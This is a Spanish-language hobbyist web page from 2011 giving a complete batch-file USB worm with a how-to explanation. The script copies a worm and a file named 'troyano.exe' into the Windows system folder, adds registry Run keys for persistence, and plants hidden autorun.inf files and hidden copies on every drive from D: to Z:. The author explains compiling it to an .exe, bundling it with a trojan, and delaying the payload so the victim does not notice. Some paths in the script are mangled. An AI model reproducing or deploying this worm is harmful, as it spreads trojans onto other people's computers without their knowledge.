[M]acro [W]eb[S]ite

[M]acro [W]eb[S]ite

@PabloMartin991

Propagar USB

bueno pongo el codigo y lo explico un poco: 


@echo off 
EXPLORER.EXE /E, 
:volver 
echo va a mirar si existe propagador.exe 
ping -n 15 localhost > nul 

IF NOT EXIST D:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST E:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST F:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST G:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST H:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST I:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST J:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST K:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST L:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST M:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST N:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST O:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST P:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Q:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST R:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST S:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST T:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST U:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST V:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST W:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST X:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Y:Ypropagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Z:/propagador.exe (GOTO NOEXISTE) 


IF EXIST D:/propagador.exe (GOTO volver) 
IF EXIST F:/propagador.exe (GOTO volver) 
IF EXIST G:/propagador.exe (GOTO volver) 
IF EXIST H:/propagador.exe (GOTO volver) 
IF EXIST I:/propagador.exe (GOTO volver) 
IF EXIST J:/propagador.exe (GOTO volver) 
IF EXIST K:/propagador.exe (GOTO volver) 
IF EXIST L:/propagador.exe (GOTO volver) 
IF EXIST M:/propagador.exe (GOTO volver) 
IF EXIST N:/propagador.exe (GOTO volver) 
IF EXIST O:/propagador.exe (GOTO volver) 
IF EXIST P:/propagador.exe (GOTO volver) 
IF EXIST Q:/propagador.exe (GOTO volver) 
IF EXIST R:/propagador.exe (GOTO volver) 
IF EXIST S:/propagador.exe (GOTO volver) 
IF EXIST T:/propagador.exe (GOTO volver) 
IF EXIST U:/propagador.exe (GOTO volver) 
IF EXIST V:/propagador.exe (GOTO volver) 
IF EXIST W:/propagador.exe (GOTO volver) 
IF EXIST X:/propagador.exe (GOTO volver) 
IF EXIST X:/propagador.exe (GOTO volver) 
IF EXIST Y:/propagador.exe (GOTO volver) 
IF EXIST Z:/propagador.exe (GOTO volver) 

:NOEXISTE 

echo no existe... seguimos 
ping -n 10 localhost > nul 
XCOPY opesys.exe "C:WINDOWSsystem32" /H/Y 
XCOPY troyano.exe "C:WINDOWSsystem32" /H/Y 

reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v opesys /t REG_SZ /d C:WINDOWSsystem32propagador.exe /f > nul 

reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v msngms /t REG_SZ /d C:WINDOWSsystem32troyano.exe /f > nul 


:bucle 
@echo off 
echo espera para crear inf y copiar de sys 
ping -n 10 localhost > nul 


FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (del %%A:Autorun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo [Autorun] > %%A:AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo action=Abrir >> %%A:AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo shellexecute= propagador.exe >> %%A:AutoRun.Inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:propagador.exe) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:troyano.exe) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:WINDOWSsystem32propagador.exe" "%%A:" /H/Y) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:WINDOWSsystem32troyano.exe" "%%A:" /H/Y) 
ping -n 10 localhost > nul 

goto volver 

--------------------------------------------------------------------------- ---------------------------------------------------- 
bueno la primera linea: EXPLORER.EXE /E, es para que cuando abras el disco removible se abra el explorador normalmente 
los echo los puse para ir probando ejecutando el .bat y ver como va funcionando en la ventana de DOS si quieren no lo pongan 
los ping -n 15 localhost > nul es para darle un tiempo a cada paso que va realizando el codigo, como para no tarar el equipo 
con IF NOT EXIST va a mirar en los discos a partir den D: hasta la Z:, si no existe el propagador.exe si es asi saltara hasta :NO EXISTE y prosedera a copiarlo en cada uno de estos. 
osea lo que tenemos que hacer es: en la raiz de un disco, puede ser el mismo removible. colocamos el "troyano.exe" y lo ponemos en modo oculto luego compilamos este codigo "propagador.bat" a "propagador.exe" con el programa: "Bat To Exe Converter" lo colocamos en la raiz junto al "troyano.exe" TAMBIEN EN MODO OCULTO cuando ejecutemos "propagador.exe" estos 2 se copiaran en: C:WINDOWSsystem32 , y de ahí se copiaran en modo oculto a todos los discos que reconozca la maquina desde el D: hasta la Z: tambien se creara en modo oculto el archivo "autorun.inf" que es el que va a ejecutar el gusano cada vez que hagamos doble clik en estos discos. 
las dos lineas de modificacion de registro son para ejecutar el gusano cada vez que se inicie el equipo 
podran ver que el codigo no ejecuta el troyano cuando se abre, esto es porque cada vez que se abriria el disco se estaria instalando y tardaria mucho tiempo la victima se daria cuenta que a la maquina le pasa algo. 
Si lo ejecuta al reiniciar el equipo a partir de ahi ya estara infectado con el troyano 
se propaga realmente muy rapido.
 

@PabloMartin991(C) 2011">
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis